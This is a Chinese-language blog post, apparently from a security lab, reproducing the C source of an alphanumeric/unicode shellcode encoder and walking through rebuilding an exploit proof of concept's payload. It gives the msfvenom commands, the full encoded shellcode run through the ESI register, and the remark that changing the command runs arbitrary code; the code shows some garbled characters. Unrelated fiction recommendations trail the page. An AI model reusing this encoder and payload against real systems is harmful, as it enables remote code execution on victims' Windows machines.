"? Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"

"\n"

"Report bugs to \n",

name

);

exit(EXIT_SUCCESS);

}

//-----------------------------------------------------------------------------

int main(int argc, char* argv[], char* envp[])

{

int? uppercase = 0, unicode = 0, sources = 0, w32sehgetpc = 0,

nonewline = 0, nocompress = 0, options = 0, spaces = 0;

char* baseaddress = NULL;

int? i, input, A, B, C, D, E, F;

char* valid_chars;

// Random seed

//struct timeval tv;

//struct timezone tz;

//ttimeofday(&tv, &tz);

//srand((int)tv.tv_sec*1000+tv.tv_usec);

// Scan all the options and set internal variables accordingly

for (i=1; i

{

if (strcmp(argv[i], "--help") == 0) help(argv[0]);

else if (strcmp(argv[i], "--version") == 0) version();

else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;

else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;

else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;

else if (strcmp(argv[i], "--sources") == 0) sources = 1;

else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;

else if (strcmp(argv[i], "-n") == 0) nonewline = 1;

else if (baseaddress == NULL) baseaddress = argv[i];

else

{

fprintf(stderr, "%s: more then one BASEADDRESS option: `%s' and `%s'\n"

"Try `%s --help' for more information.\n",

argv[0], baseaddress, argv[i], argv[0]);

exit(EXIT_FAILURE);

}

}

// No baseaddress option ?

if (baseaddress == NULL)

{

fprintf(stderr, "%s: missing BASEADDRESS options.\n"

"Try `%s --help' for more information.\n", argv[0], argv[0]);

exit(EXIT_FAILURE);

}

// The uppercase, unicode and nocompress option determine which decoder we'll

// need to use. For each combination of these options there is an array,

// indexed by the baseaddress with decoders. Pointers to these arrays have

// been put in another array, we can calculate the index into this second

// array like this:

options = uppercase+unicode*2+nocompress*4;

// decoders[options] will now point to an array of decoders for the specified

// options. The array contains one decoder for every possible baseaddress.

// Someone wants to know which baseaddress options the specified options

// for uppercase, unicode and/or nocompress allow:

if (sources)

{

printf("Available options for %s%s alphanumeric shellcode:\n",

uppercase ? "uppercase" : "mixedcase",

unicode ? " unicode-proof" : "");

for (i=0; decoders[options][i].id != NULL; i++)

{

printf("? %s\n", decoders[options][i].id);

}

printf("\n");

exit(EXIT_SUCCESS);

}

//TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI

if (uppercase)

{

if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";

else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";

} else

{

if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

}

// Find and output decoder

for (i=0; _stricmp(baseaddress, decoders[options][i].id) != 0; i++)

{

if (decoders[options][i+1].id == NULL)

{

fprintf(stderr, "%s: unrecognized baseaddress option `%s'\n"

"Try `%s %s%s--sources' for a list of BASEADDRESS options.\n",

argv[0], baseaddress, argv[0],

uppercase ? "--uppercase " : "",

unicode ? "--unicode " : "");

exit(EXIT_FAILURE);

}

}

printf("%s", decoders[options][i].code);

// system("pause");

// read, encode and output shellcode

for (int j=0;j

{

input=evil[j];

// encoding AB -> CD 00 EF 00

A = (input & 0xf0) >> 4;

B = (input & 0x0f);

F = B;

// E is arbitrary as long as EF is a valid character

i = rand() % strlen(valid_chars);

while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }

E = valid_chars[i] >> 4;

// normal code uses xor, unicode-proof uses ADD.

// AB ->

D =? unicode ? (A-E) & 0x0f : (A^E);

// C is arbitrary as long as CD is a valid character

i = rand() % strlen(valid_chars);

while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }

C = valid_chars[i] >> 4;

printf("%c%c", (C<<4)+D, (E<<4)+F);

}

//可以這樣使用命令行下:alpha2 esp

//esp指向了shellcode

printf("A%s", nonewline ? "" : "\n"); // Terminating "A"

exit(EXIT_SUCCESS);

}

使用時把evil變量替換成自己的shellcode,再生成exe運行來生成編碼。

上面代碼中的evil是使用msf命令msfvenom -p windows/exec CMD="calc.exe"? -f c -b '\x00'生成的,和作者poc的效果一樣運行了計算機。修改一下CMD的內容即可執行任意命令。

仔細觀察發現作者poc的前綴VVYA4444444444出現在如下代碼片段中:

uppercase_unicode_nocompress_decoders[] = {

{ "nops",? ? "44444444444444" uppercase_unicode_decoder_body },

{ "eax",? ? ? "PPYA4444444444" uppercase_unicode_decoder_body },

{ "ecx",? ? ? "44444444444444" uppercase_unicode_decoder_body },

{ "edx",? ? ? "RRYA4444444444" uppercase_unicode_decoder_body },

{ "ebx",? ? ? "SSYA4444444444" uppercase_unicode_decoder_body },

{ "esp",? ? ? "TUYA4444444444" uppercase_unicode_decoder_body },

{ "ebp",? ? ? "UUYA4444444444" uppercase_unicode_decoder_body },

{ "esi",? ? ? "VVYA4444444444" uppercase_unicode_decoder_body },

{ "edi",? ? ? "WWYA4444444444" uppercase_unicode_decoder_body },

{ "[esp]",? ? "YA444444444444" uppercase_unicode_decoder_body },

{ "[esp+4]",? "YUYA4444444444" uppercase_unicode_decoder_body },

{ NULL, NULL }

};

所以我們得知了作者生成時使用的參數,于是使用如下命令生成最終的shellcode,其中ConsoleApplication1.exe是用上面的代碼生成的:

ConsoleApplication1.exe --nocompress --unicode --uppercase esi VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYJJ1HYT4NDL4286ZKUL69ORTNIWYVQNQU37PLDNQPPN4M3PPLQN4NJSXJQPZZ5T1KQOKQO5DP0SKOKILS2PKPOX0TNMPMMMQKUQ44JOVVNYSZLBINOQO8LYXWCURKQ8KDJ2LR4LJXK4Q4UQNU4YNM80OG1FK60K4KIOJDQMIOYOLX0DOWRS7LRNQKWMLMKMYPDLYJ5Y2WNZ59TM2TOLVOZRKMPZEEBVK3VLVK1WUJU6KL2LQ3TRW3F4BNNL3MP2NXOHPWGJE8C5MWLURY7O0LPZ9KCUYDWLN42YYVSSZYO5Y8ZTKU5MLYR8LQV7P163VDJLUKKHE7P9XCYRSUVJK4Q3KV6SS5PZPRYHSOLXSONNK47SNN66D9NYZNKUYK07PRO8T2B9QLOO3RZU0KZBOOLBX1V9P793NJ5KQZXMLGH4Q1PXM1OLRKRLQKPA



替換原poc的shellcode,執行計算器成功。

0x02后記

其實這里因為不熟悉shellcode,所以繞了一圈去生成,其實是可以用msf直接生成的。。。


來自昊天實驗室


一開始用msf的編碼器生成shellcode發現開頭有亂碼,于是有了上一篇文章,足足繞了一大圈。

最后在大佬的提示下才發現是因為一開始沒有指定寄存器。

所以直接用這個命令就能生成可用的shellcode了:

msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=ESI

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 228,238評論 6 531
  • 死咒
    序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 98,430評論 3 415
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 176,134評論 0 373
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 62,893評論 1 309
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 71,653評論 6 408
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 55,136評論 1 323
  • 城市分裂傳說
    那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,212評論 3 441
  • 雙鴛鴦連環套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,372評論 0 288
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 48,888評論 1 334
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 40,738評論 3 354
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 42,939評論 1 369
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,482評論 5 359
  • ?日本核電站爆炸內幕
    正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,179評論 3 347
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,588評論 0 26
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 35,829評論 1 283
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 51,610評論 3 391
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 47,916評論 2 372

推薦閱讀更多精彩內容